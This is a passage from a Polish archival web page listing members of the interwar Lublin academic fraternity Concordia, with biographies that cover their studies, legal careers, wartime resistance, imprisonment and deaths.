 92. Tomasz hr. Rostworowski, (9 listopada 1904 w Warszawie - 9 marca 1974 w Łodzi) herbu Nałęcz, s. Karola Pawła (Arkonia) i Teresy z Fudakowskich, bratanek Michała (Corolla), założyciel Concordii 1922, pierwszy skarbnik 1922/23, jezuita, kapelan Komendy Głównej AK w czasie Powstania Warszawskiego, w nocy z 21/22 stycznia 1950 aresztowany i oskarżony o działalność antypaństwową, w 1951 skazany na 12 lat więzienia, więziony na Mokotowie w Warszawie i we Wronkach, ze względu na zły stan zdrowia zwolniony w 1956, socjusz magistra nowicjatu w Kaliszu 1956/57, duszpasterz akademicki w Lublinie 1957-61, dyrektor Sekcji Polskiej Radia Watykańskiego 1967-73, zmarł w opinii świętości, odznaczony dwukrotnie Krzyżem Walecznych, Orderem Virtuti Militari i Złotym Krzyżem Zasługi z Mieczami
 93. Ignacy Rusiecki, założyciel Concordii 1922

  Franciszek Rzączyński.

 94. Franciszek Rzączyński, (1908 - 19 maja 1993) c. 1927, mgr praw i ekonomii KUL, adwokat w Lublinie

 95. Jerzy Rzewuski,
 96. Zygmunt Sawnor,

  Józef Serafin (?), 8 VI 1934 r.

 97. Józef Serafin, (25 lutego 1913 w Lublinie - 13 stycznia 1996 w Warszawie) absolwent Gimnazjum im. St. Staszica w Lublinie 1932, student Wydziału Prawa KUL, c. 1934 (1932/33?), służba wojskowa w Podchorążówce Piechoty w Równem 1933, mgr praw 1938, praktyki zawodowe w ambasadach RP w Bukareszcie i Brukseli, praca w zbrojeniowym przemyśle lotniczym w Rzeszowie 1939, ppor. rez., w wojnie obronnej 1939 w obronie Włodzimierza Wołyńskiego, w 1940 w ramach akcji przesiedleńczej przedostał się do Generalnej Guberni, mieszkał w Lublinie, a następnie w Kraśniku, pracował w różnych zawodach, w konspiracji w ZWZ-AK, aresztowany w 1942, więziony na Zamku Lubelskim i obozie na Majdanku, gdzie w obozowym ruchu oporu prowadził działalność oświatowo-kulturalną, uciekł z transportu przy ewakuacji obozu, po wojnie skierowany na Śląsk, gdzie pracował w szkolnictwie, w 1952 przeniósł się do Warszawy, pracował na kierowniczych stanowiskach w Głównym Urzędzie Miar, Ministerstwie Oświaty oraz w resortach komunikacji i transportu, w 1960 skierowany na placówkę PLL “Lot” w Nowego Jorku, w 1965 przeszedł do pracy w centralach handlu zagranicznego, od 1978 na emeryturze, pochowany w Pyrach, odznaczony Kawalerskim Krzyżem OOP, Krzyżem Oświęcimskim oraz szeregiem innych

 98. Czesław Skorupski, założyciel Concordii 1922
 99. Stefan Skublewski, (1910-1987) c. 1931, olderman sem. let. 1933/34, prawnik, adwokat, po wojnie pracownik KUL

  Sławomir Sokołowski, 1938 r.

 100. Sławomir (Stanisław ?) Sokołowski, sekretarz 1936/37, 1937/38 oraz 1938/39

 101. Janusz Steliński, ( - lata 50-te) wiceprezes 1930/31, wiceolderman 1932, prezes 1932/33, mgr praw, adwokat w Warszawie

  Henryk Suchodolski.

 102. Henryk Suchodolski, (27 czerwca 1900 w Wielkopolu w pow. krasnostawskim - 6 luty 1941 w Auschwitz) syn Eustachego i Józefy z Kosteckich, brat Zygmunta (Arkonia), od 1918 w 7 Pułku Ułanów Lubelskich, w wojnie polsko-rosyjskiej 1920 ranny w szarży pod Cycowem, odznaczony Krzyżem Virtuti Militari V kl. oraz Krzyżem Walecznych, absolwent Gimnazjum im. Stefana Batorego w Lublinie, student i absolwent prawa UL, założyciel Concordii 1922, pierwszy wiceprezes 1922/23, prezes 1923/24, sekretarz 1926/27, po studiach aplikant adwokacki, egzamin adwokacki 1935, prawnik w Banku Gospodarstwa Krajowego, do 1939 radca prawny Związku Ziemian, adwokat w Lublinie, w 1939 adiutant 7 Pułku Ułanów, odznaczony ponownie Krzyżem Walecznych, w czasie okupacji współpracował przy tworzeniu Związku Jaszczurczego, organizator konspiracyjnego Pułku “Jeleń”, aresztowany podczas ucieczki na Słowację, więziony w Tarnowie, a następnie w obozie w Auschwitz, gdzie zginął (pod nazwiskiem Eustachy Ciesielski nr obozowy 5635)

  Jerzy Szczepowski, druga poł. lat 30-tych.

 103. Jerzy Szczepowski, (26 kwietnia 1915 w maj. Bewern w Kurlandii - 1940 w Katyniu) s. Wacława i Janiny z Mianowskich, uczeń Gimnazjum w Chorowie (Chyrowie ?), matura Szkoła Lubelska 1933, student i absolwent prawa KUL, c. 1936, poeta, literat, publikował w pismach akademickich “Nurty” i w “Trybunie” oraz literackich “Odrodzenie”, “Cięciwy”, “Kamena” i “Odskocznia”, absolwent Szkoły Podchorążych Rezerwy Kawalerji w Grudziądzu 1934, ppor. rez., przydzielony do 19 Pułu Ułanów, w październiku 1939 aresztowany przez NKWD w Sołowinach k. Łucka i osadzony w obozie w Kozielsku, zamordowany przez NKWD

 104. Tadeusz Szlęk, c. 1932
 105. Kazimierz Szniersztein (Szniersztajn, Schnierstajn), ( - po 1987) mgr praw, sędzia Sądu Okręgowego w Lublinie
 106. Antoni Szwacki, c. 1936 (?), ostatni olderman 1939
 107. Jerzy Szwarc, (1909-1989) sekretarz sem. zim. 1930/31, mgr praw, adwokat w Lublinie
 108. Witold Szwentner, sekretarz 1928/29, adwokat w Lublinie

  Eugeniusz Szyszkowski, 1938 r.

 109. Eugeniusz Szyszkowski,

 110. Roman Śliwa,

  Stanisław Śniechórski, ok. 1935 r.

 111. Stanisław Śniechórski, (1913-2008 w Warszawie) student i absolwent KUL, c. 1932, olderman 1934/35, prezes sem. let. 1935/36, żołnierz Powstania Warszawskiego, adwokat w Warszawie, zastępca członka Zarządu 1993-95 oraz członek Zarządu 1995-97, wiceprezes 1997-1999 Stowarzyszenia Filistrów Polskich Korporacji Akademickich

 112. Stefan Tłuchowski, mgr praw, adwokat pod Lublinem
 113. Bolesław Trzciński, delegat Concordii na IX Zjazd ZPKA, po wojnie posiadał zakład cukierniczy w Lublinie

  Stefan Trzetrzewiński, 1918 r.

 114. Stefan Trzetrzewiński, (9 grudnia 1899 w Szreniawie k. Miechowa - 5 maja 1971 w Warszawie) s. Ludwika i Michaliny z d. Ptak, w okresie I wojny światowej uczęszczał do Męskiej Szkoły Handlowej w Kielcach, w 1915 należał do konspiracyjnej szkolnej drużyny harcerskiej im. Czachowskiego, słuchacz UL 1927-29, olderman 1926/27 oraz 1927/28, ukończył finanse i bankowość na Uniwersytecie w Antwerpii, gospodarował maj. Józefa Targowskiego Winiary pod Sandomierzem, w okresie II wojny światowej administrator maj. ziemskiego w Zapuście k. Zawichostu, po wojnie osiadł w Warszawie, od 1960 na emeryturze, pochowny na cmentarzu na Bródnie w Warszawie

 115. Przemysław Tureczek,
 116. Otto Uhlik (Uhlig), sekretarz Lubelskiego Koła Międzykorporacyjnego 1924/25, mgr praw, w 1939 wiceprokurator w Kielcach (?), adwokat w Lublinie (?)

  Stanisław Wąsowicz-Dunin, 1935 r.

 117. Stanisław Wąsowicz-Dunin, ( - styczeń 1981) c. 1933 (?), członek Komisji Rewizyjnej ZPKA, mgr praw, adwokat i dziekan Rady Adwokackiej w Poznaniu, pracownik Wydziału Prawa i Administracji UAM, działacz Solidarności

 118. Aleksander Wegner,

  Jerzy Wilski, 1928 r.

 119. Jerzy Wilski, sekretarz 1925/26, wiceprezes 1927/28, prezes 1928/29 oraz 1929/30, mgr praw, pracował w więziennictwie

 120. Grzegorz Winnicki, (?) wiceprzewodniczący Lubelskiego Koła Międzykorporacyjnego 1924/25
 121. Bronisław Włodek,

  Stefan Wolski, 1923 r.

 122. Stefan Wolski, (2 sierpnia 1903 w Nałęczowie - 1957?) student i absolwent 1925 prawa UL, założyciel Concordii 1922, pierwszy prezes 1922/23 oraz prezes 1924/25, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim, po aplikacji asesor w Lublinie, a następnie podprokurator w Radomiu i Lublinie, a od 1932 w Wilnie, oskarżał w głośnym procesie wileńskich komunistów (Jerzy Putrament opisał go w powieści “Rzeczywistość” jako prok. Zwolskiego), ppor. rez. 1932 z przydziałem do 1 Dywizjonu Artylerii Konnej, uczestnik wojny obronnej 1939, walczył jako oficer zwiadowczy 3 Dywizjonu Artylerii Konnej w rejonie Krasnobrodu i Zamościa, w czasie okupacji pracował jako buchalter w majątku krewnego Stanisława Rzewuskiego w Woli Sławińskiej, od 1942 w konspiracji AK, prokurator Wojskowego Sadu Specjalnego w lubelskim Okręgu AK 1942-44, awansowany do stopnia porucznika 1944, w końcu 1944 aresztowany przez NKWD, skazany na karę śmierci zamienioną na długoterminowe więzienie, więziony w więzieniach we Wronkach i Rawiczu, zwolniony i zrehabilitowany 1956, nie mogąc znaleźć pracy załamał się i popełnił samobójstwo

  Wiesław Wolski, pierwsza poł. lat 30-tych.

 123. Wiesław Wolski, wiceprezes 1931/32 oraz 1932/33, mgr praw, adwokat w Kielcach i Łodzi

 124. Stanisław Wroński,
 125. Tadeusz Wroński,
 126. Stanisław Wyrzykowski, ostatni sekretarz 1939
 127. Feliks Wyszyński, założyciel Concordii (?)
 128. Jan Wujastyk, (14 września 1910 w maj. Józefin w pow. krasnostawskim - 1940 w Katyniu) s. Stanisława i Marii z Łagunów, student i absolwent 1938 prawa KUL, olderman 1936/37, prezes Bratniej Pomocy KUL i Młodzieży Wszechpolskiej w Lublinie, pracował w maj. rodziców, ppor. rez., przydzielony do 7 Pułku Piechoty Legionów, a następnie do 45 Pułku Piechoty Strzelców Kresowych w Równem, w niewoli sowieckiej, zamordowany w Katyniu
 129. Zbigniew Zaremski,

  Zbigniew Zawadzki, pierwsza poł. lat 30-tych.

 130. Zbigniew Zawadzki, ( - lata 60-te ?) sekretarz sem. zim. 1929/30, prezes 1931/32, olderman (?) 1932/33, mgr praw, adwokat w Lublinie

  Leonard Zub-Zdanowicz, lata 30-te.

 131. Leonard Szczęsny Zub-Zdanowicz, (6 listopada 1912 w Popowcach k. Staro-Konstantynowa na Wołyniu - 12 sierpnia 1982 w Waterbury w stanie Connecticut) z rodziny ziemiańskiej herbu Jastrzębiec, s. Melitona i Marii z Dunin-Juniewiczów, absolwent Gimnazjum Humanistycznego im. Stanisława Staszica w Hrubieszowie 1930, słuchacz Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu 1930-31, ppor. rez. kawalerii 1933, student i absolwent prawa KUL 1931-35, c. 1931, należał także do Legionu Młodych i Sodalicji Mariańskiej, po studiach pracował w Izbie Skarbowej w Lublinie, a następnie w Garwolinie i Łukowie, po ukończeniu Kursu Aplikacyjnego dla Oficerów Młodszych w Centrum Wyszkoleniaa Żandarmerii w Grudziądzu 1939 powołany do czynnej służby wojskowej, przydzielony do 3 Dywizjonu Żandarmerii w Grodnie, w czasie wojny obronnej 1939 dowódca plutonu pieszego żandarmerii nr 29 w 29 Dywizji Piechoty, a po jej rozbiciu w innych odziałach, za kampanię wrześniową odznaczony Virtuti Militari, przez Węgry, Jugosławię dostał się do Francji, wstąpił do Samodzielnej Brygady Strzelców Podhalańskich, gdzie zorganizował 15 Pluton Żandarmerii Polowej, walczył pod Narvikiem w Norwegii, a następnie w okolicach Rennes we Francji, ewkuowany do Wielkiej Brytanii, dowódca 2 Plutonu Żandarmerii Polowej w 3 Brygadzie Kadrowej Strzelców, w 1942 zaprzysiężony jako “cichociemny” i zrzuciony do kraju, ps. “Ząb”, “Dor” i “Szprung”, w 1943 przyłączył się do NSZ, dowódca oddziau partyzanckiego NSZ na Lubelszczyźnie, a następnie w Brygadzie Świętokrzyskiej, odznaczony Krzyżem Walecznych i awansowany do stopnia podpułkownika NSZ 1945, od sierpnia 1945 w 2 Korpusie Polskim we Włoszech, po wojnie na emigracji w Wielkiej Brytanii, a od 1949 w Stanach Zjednoczonych, pracował jako inżynier w Zakładach Sendzimir Precision Metals w Waterbury, w 1947 mianowany przez gen. Władysława Andersa majorem w Korpusie Oficerów Kawalerii, aktywny w organizacjach polonijnych i organizacji pomocy dla Polski, w tym KUL, ROPCiO i Solidarności

 132. Kazimierz Zdunkiewicz,
 133. Ryszard Zdziarski, (5 listopada 1915 w Kijowie - listopad 2003 w Giżycku) brat Janusza (Leopolia), c. 1935, student i absolwent prawa KUL 1934-38, uczestnik najprawdopodobniej ostatniego pojedynku II Rzeczypospolitej (stroną obrażającą był rosyjski student medycyny Dymitr Twierdochlibow, pojedynek odbył się na pistolety w Wilnie w drugiej połowie czerwca 1939 i zakończył się śmiertelnym postrzeleniem przeciwnika), asystent w Katedrze Prawa Rzymskiego KUL, sędzia w Piszu, Węgorzewie i Giżycku, adwokat w Giżycku
 134. Jan Zdzienicki, (1909 - lipiec 1997 w Lublinie) herbu Poraj, c. 1930, wiceolderman 1932, wiceprezes sem. let. 1933/34, prezes 1935 (II), absolwent KUL, mgr praw, adwokat
 135. Jan Zdzitowiecki, założyciel Concordii 1923

  Jerzy Zyskowski, 1936 r.

 136. Jerzy Zyskowski, (25 lutego 1913 w Łęczyszycach - 13 marzec 1945) s. Bolesława i Łucji z Zielińskich, student i absolwent prawa KUL, c. 1931, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu, do 1939 radca prawny w Ubezpieczalni Społecznej w Lublinie, w wojnie obronnej 1939 w stopniu porucznika w I Pułku Strzelców Konnych w Warszawskiej Brygadzie Pancerno-Motorowej, w czasie okupacji w konspiracji w AK w rejonie Puław ps. “Topór”, zmarł na gruźlicę, pochowany na cmentarzu w Konopnicy k. Lublina

 137. Jan Żelazny,
 138. Tadeusz Żmigrodzki, (1908-1960) mgr praw, adwokat w Lublinie
 139. Stanisław Żymirski,

Poczet sztandarowy Concordii, Lublin ok. 1935 r.

Listę członków opracowano na podstawie:

1) Stanisław Śniechórski, Lista członków Korporacji Akademickiej Concordia w latach 1922-1939, maszynopis,
2) danych ze strony: www.concordia.republika.pl,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Concordia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 23 IV 2015 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka Concordia (Lublin), (na:) www.archiwumkorporacyjne.pl, stan 23 IV 2015 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }